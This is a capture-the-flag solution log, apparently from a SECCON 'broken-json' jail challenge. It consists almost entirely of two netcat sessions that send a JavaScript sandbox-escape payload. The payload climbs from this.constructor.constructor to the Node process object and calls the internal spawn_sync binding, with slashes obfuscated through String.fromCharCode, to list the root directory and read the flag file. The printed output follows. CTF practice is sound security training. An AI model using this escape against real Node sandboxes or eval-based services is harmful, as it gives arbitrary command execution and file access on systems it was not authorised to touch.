Break Time ☕

nc broken-json.seccon.games 5000

❯ nc broken-json.seccon.games 5000
jail> 123,2.1e+611111111111111,asdasdasd/\"",console.log(this.constructor.constructor('return process')().binding('spawn_sync').spawn({file:String.fromCharCode(47)+'bin'+String.fromCharCode(47)+'ls',args:[String.fromCharCode(47)+'bin'+String.fromCharCode(47)+'ls','-la',String.fromCharCode(47)],envPairs:[],stdio:[{type:'pipe',readable:true,writable:false},{type:'pipe',readable:false,writable:true},{type:'pipe',readable:false,writable:true}]}).output[1].toString()),"
total 68
drwxr-xr-x   1 nobody nogroup 4096 Dec 12 05:14 .
drwxr-xr-x   1 nobody nogroup 4096 Dec 12 05:14 ..
drwxr-xr-x   3 nobody nogroup 4096 Dec 12 05:14 app
lrwxrwxrwx   1 nobody nogroup    7 Dec  8 00:00 bin -> usr/bin
drwxr-xr-x   2 nobody nogroup 4096 Aug 24 16:05 boot
drwxrwxrwt   2 nobody nogroup  100 Dec 12 12:32 dev
drwxr-xr-x  29 nobody nogroup 4096 Dec 12 05:14 etc
-rw-r--r--   1 nobody nogroup   41 Dec 11 21:20 flag-235a7a7283c92a9c1f9a1e521e0e70f3.txt
drwxr-xr-x   3 nobody nogroup 4096 Dec  8 23:13 home
lrwxrwxrwx   1 nobody nogroup    7 Dec  8 00:00 lib -> usr/lib
lrwxrwxrwx   1 nobody nogroup    9 Dec  8 00:00 lib64 -> usr/lib64
drwxr-xr-x   2 nobody nogroup 4096 Dec  8 00:00 media
drwxr-xr-x   2 nobody nogroup 4096 Dec  8 00:00 mnt
drwxr-xr-x   3 nobody nogroup 4096 Dec  8 23:14 opt
dr-xr-xr-x 177 nobody nogroup    0 Dec 13 18:54 proc
drwx------   3 nobody nogroup 4096 Dec 12 05:14 root
drwxr-xr-x   3 nobody nogroup 4096 Dec  8 00:00 run
lrwxrwxrwx   1 nobody nogroup    8 Dec  8 00:00 sbin -> usr/sbin
drwxr-xr-x   2 nobody nogroup 4096 Dec  8 00:00 srv
drwxr-xr-x   2 nobody nogroup 4096 Aug 24 16:05 sys
drwxrwxrwt   3 nobody nogroup 4096 Dec 12 05:14 tmp
drwxr-xr-x  12 nobody nogroup 4096 Dec  8 00:00 usr
drwxr-xr-x  11 nobody nogroup 4096 Dec  8 00:00 var

[ 123, Infinity, 'asdasdasd', '/"', undefined, '' ]
❯ nc broken-json.seccon.games 5000
jail> 123,2.1e+611111111111111,asdasdasd/\"",console.log(this.constructor.constructor('return process')().binding('spawn_sync').spawn({file:String.fromCharCode(47)+'bin'+String.fromCharCode(47)+'cat',args:[String.fromCharCode(47)+'bin'+String.fromCharCode(47)+'cat',String.fromCharCode(47)+'flag-235a7a7283c92a9c1f9a1e521e0e70f3.txt'],envPairs:[],stdio:[{type:'pipe',readable:true,writable:false},{type:'pipe',readable:false,writable:true},{type:'pipe',readable:false,writable:true}]}).output[1].toString()),"
SECCON{Re:Jail_kara_Hajimeru_Break_Time}

[ 123, Infinity, 'asdasdasd', '/"', undefined, '' ]